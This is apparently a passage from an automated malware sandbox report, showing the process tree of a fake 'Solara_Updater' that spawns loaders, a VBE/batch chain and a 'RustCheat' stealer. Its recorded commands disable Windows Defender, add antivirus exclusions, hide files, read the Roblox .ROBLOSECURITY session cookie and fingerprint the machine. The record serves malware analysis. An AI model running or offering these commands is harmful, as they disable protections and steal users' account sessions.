        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        36⤵
        
        PID:880
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        37⤵
        
        PID:3840
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        34⤵
        
        PID:2468
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        35⤵
        
        PID:64
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        35⤵
        Modifies registry class
        
        PID:1088
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        36⤵
        Checks computer location settings
        
        PID:3464
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        37⤵
        
        PID:1100
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        38⤵
        
        PID:4020
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        35⤵
        
        PID:228
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        36⤵
        
        PID:3756
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        36⤵
        Modifies registry class
        
        PID:2120
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        37⤵
        
        PID:3292
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        38⤵
        
        PID:1196
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        39⤵
        
        PID:4668
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        36⤵
        
        PID:2440
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        37⤵
        
        PID:1044
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        37⤵
        Modifies registry class
        
        PID:4576
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        38⤵
        
        PID:3836
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        39⤵
        
        PID:1312
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        40⤵
        
        PID:4112
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        37⤵
        
        PID:2848
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        38⤵
        
        PID:4384
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        38⤵
        Modifies registry class
        
        PID:3744
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        39⤵
        
        PID:4236
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        40⤵
        
        PID:2028
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        41⤵
        
        PID:3724
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        38⤵
        
        PID:2436
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        39⤵
        
        PID:4088
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        39⤵
        Checks computer location settings
        Modifies registry class
        
        PID:3392
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        40⤵
        
        PID:4228
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        41⤵
        
        PID:2296
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        42⤵
        
        PID:1044
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        39⤵
        
        PID:3548
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        40⤵
        
        PID:4884
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        40⤵
        Modifies registry class
        
        PID:3276
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        41⤵
        
        PID:2856
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        42⤵
        
        PID:4720
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        43⤵
        
        PID:4412
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        40⤵
        
        PID:1984
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        41⤵
        
        PID:3800
        
        C:\Users\Admin\AppData\Local\Temp\XClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\XClient.exe"
        42⤵
        
        PID:3840
        
        C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
        42⤵
        
        PID:1272
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        41⤵
        Modifies registry class
        
        PID:4664
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        42⤵
        
        PID:3392
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        43⤵
        
        PID:3900
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        44⤵
        
        PID:3216
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        41⤵
        
        PID:4520
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        42⤵
        
        PID:4272
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        42⤵
        Checks computer location settings
        Modifies registry class
        
        PID:2424
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        43⤵
        Checks computer location settings
        
        PID:4648
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        44⤵
        
        PID:4296
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        45⤵
        
        PID:3644
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        42⤵
        Checks computer location settings
        
        PID:3724
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        43⤵
        
        PID:3908
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        43⤵
        
        PID:996
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        44⤵
        
        PID:4024
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        45⤵
        
        PID:2448
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        46⤵
        
        PID:3720
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        43⤵
        
        PID:1048
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        44⤵
        
        PID:3476
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        44⤵
        Checks computer location settings
        Modifies registry class
        
        PID:1656
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        45⤵
        
        PID:2372
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        46⤵
        
        PID:3876
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        47⤵
        
        PID:3944
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        44⤵
        
        PID:4700
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        45⤵
        
        PID:1344
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        45⤵
        Checks computer location settings
        Modifies registry class
        
        PID:2552
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        46⤵
        
        PID:4800
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        47⤵
        
        PID:2036
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        48⤵
        
        PID:2552
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        45⤵
        
        PID:4720
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        46⤵
        
        PID:3468
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        46⤵
        Checks computer location settings
        Modifies registry class
        
        PID:3536
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        47⤵
        
        PID:3908
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        48⤵
        
        PID:3804
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        49⤵
        
        PID:1048
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        46⤵
        Checks computer location settings
        
        PID:4384
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        47⤵
        
        PID:4640
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        47⤵
        Modifies registry class
        
        PID:1268
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        48⤵
        
        PID:4032
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        49⤵
        
        PID:4712
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        50⤵
        
        PID:5088
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        47⤵
        
        PID:3744
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        48⤵
        
        PID:4508
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        48⤵
        Checks computer location settings
        Modifies registry class
        
        PID:3476
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        49⤵
        Checks computer location settings
        
        PID:1720
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        50⤵
        
        PID:3720
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        51⤵
        
        PID:3452
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        48⤵
        
        PID:4088
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        49⤵
        
        PID:1404
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        49⤵
        Modifies registry class
        
        PID:3264
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        50⤵
        
        PID:2400
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        51⤵
        
        PID:4508
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        52⤵
        
        PID:2600
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        49⤵
        
        PID:996
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        50⤵
        
        PID:4452
        
        C:\Users\Admin\AppData\Local\Temp\XClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\XClient.exe"
        51⤵
        
        PID:4712
        
        C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
        51⤵
        
        PID:3184
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        50⤵
        Checks computer location settings
        Modifies registry class
        
        PID:3180
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        51⤵
        
        PID:3420
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        52⤵
        
        PID:3988
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        53⤵
        
        PID:2676
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        50⤵
        
        PID:1568
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        51⤵
        
        PID:3804
        
        C:\Users\Admin\AppData\Local\Temp\XClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\XClient.exe"
        52⤵
        
        PID:4780
        
        C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
        52⤵
        
        PID:1088
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        51⤵
        Checks computer location settings
        Modifies registry class
        
        PID:4920
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        52⤵
        
        PID:1628
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        53⤵
        
        PID:1624
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        54⤵
        
        PID:4412
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        51⤵
        
        PID:4444
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        52⤵
        
        PID:4912
        
        C:\Users\Admin\AppData\Local\Temp\XClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\XClient.exe"
        53⤵
        
        PID:3428
        
        C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
        53⤵
        Drops file in Drivers directory
        
        PID:4876
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        54⤵
        
        PID:3548
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
        54⤵
        Views/modifies file attributes
        
        PID:1332
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'
        54⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1952
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        54⤵
        
        PID:3772
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        54⤵
        
        PID:4984
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        54⤵
        
        PID:3944
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        54⤵
        
        PID:4540
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        54⤵
        
        PID:4888
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        54⤵
        
        PID:3856
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        54⤵
        
        PID:2036
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        54⤵
        Detects videocard installed
        
        PID:4844
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause
        54⤵
        
        PID:756
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        55⤵
        Runs ping.exe
        
        PID:3252
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        52⤵
        Checks computer location settings
        Modifies registry class
        
        PID:4864
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        53⤵
        
        PID:8
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        54⤵
        
        PID:4024
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        55⤵
        
        PID:2904
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        52⤵
        
        PID:1632
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        53⤵
        
        PID:1568
        
        C:\Users\Admin\AppData\Local\Temp\XClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\XClient.exe"
        54⤵
        
        PID:2028
        
        C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
        54⤵
        
        PID:4668
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        53⤵
        Checks computer location settings
        Modifies registry class
        
        PID:4456
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        54⤵
        
        PID:2952
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        55⤵
        
        PID:1568
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        56⤵
        
        PID:4396
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        53⤵
        Checks computer location settings
        
        PID:2836
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        54⤵
        
        PID:3712
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        54⤵
        Modifies registry class
        
        PID:2620
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        55⤵
        Checks computer location settings
        
        PID:1556
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        56⤵
        
        PID:4228
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        57⤵
        
        PID:1548
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        54⤵
        Checks computer location settings
        
        PID:2612
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        55⤵
        
        PID:2264
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        55⤵
        Modifies registry class
        
        PID:1184
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        56⤵
        
        PID:2492
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        57⤵
        
        PID:4892
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        58⤵
        
        PID:3908
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        55⤵
        
        PID:3800
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        56⤵
        
        PID:1708
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        56⤵
        Modifies registry class
        
        PID:1632
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        57⤵
        
        PID:1408
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        56⤵
        
        PID:4668
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        57⤵
        
        PID:3104
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        57⤵
        Modifies registry class
        
        PID:1944
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        58⤵
        
        PID:5004
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        57⤵
        
        PID:1808
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        58⤵
        
        PID:2544
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        58⤵
        Modifies registry class
        
        PID:1508
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        59⤵
        
        PID:3084
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        58⤵
        Checks computer location settings
        
        PID:116
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        59⤵
        
        PID:4560
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        59⤵
        Modifies registry class
        
        PID:2836
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        60⤵
        
        PID:4768
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        59⤵
        Checks computer location settings
        
        PID:3680
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        60⤵
        
        PID:3848
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        60⤵
        
        PID:752
        
        C:\Windows\SysWOW64\WScript.exe
        
